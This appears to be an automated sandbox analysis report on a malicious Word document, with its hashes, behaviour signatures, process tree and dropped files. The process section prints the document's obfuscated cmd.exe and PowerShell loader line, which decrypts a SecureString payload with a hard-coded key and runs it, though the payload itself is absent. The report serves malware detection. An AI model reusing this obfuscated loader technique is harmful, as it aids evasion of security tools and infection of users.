Analysis

  • max time kernel
    141s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-05-2024 18:43

General

  • Target

    72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    72e69b0bbd5fb4d0d83a7fe4fe8f1234

  • SHA1

    2ee022c7b7e85dce006c19a963fcdbae2b0c85da

  • SHA256

    5b9bce29afccc2b7c343b74f571061dd8c148a162849b1263913f549a5f14ce0

  • SHA512

    5634d571ecf9c1f67d05c4d3ec934b5970292fcc34765c99fe6d91f4270e09d9ae9becd9f4d661f19bcaa24c97cb1122eae852a483c2746c674732dd11d545c6

  • SSDEEP

    3072:cgn/iKFBaqCHonM8VIGNsmBGorUKqkr+1NPnjnw8WKzR:cg/iQBacxNsmBGo4dkruBnjw8

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" YHlNCRaMuFaDT iFHuAKCifprwwAmRsKw YzdoijvuUPa & %^C^o^m^S^p^E^c^% %^C^o^m^S^p^E^c^% /V /c set %zTOpZSzwuUrzNKL%=FmcpqXGKjQdocU&&set %JwmDJiiw%=p&&set %VVvAbUYhRzWLA%=o^w&&set %PbRZwIkZzuwSmlv%=SrZtnlthiZMDG&&set %TESkLfMR%=!%JwmDJiiw%!&&set %IoLUZEPfoOCPfoh%=XlUPuzmPihiik&&set %JQjTXiIwH%=e^r&&set %WfJPszLzNRcJXq%=!%VVvAbUYhRzWLA%!&&set %cTBUOhlq%=s&&set %uWvjToFnwMhjJic%=iHwLpHnroL&&set %iYnlXDfjwztpzJ%=he&&set %dndPGSiZOoY%=ll&&!%TESkLfMR%!!%WfJPszLzNRcJXq%!!%JQjTXiIwH%!!%cTBUOhlq%!!%iYnlXDfjwztpzJ%!!%dndPGSiZOoY%! " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('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'| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('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'| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4796

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDB749.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdcotxyy.iyo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
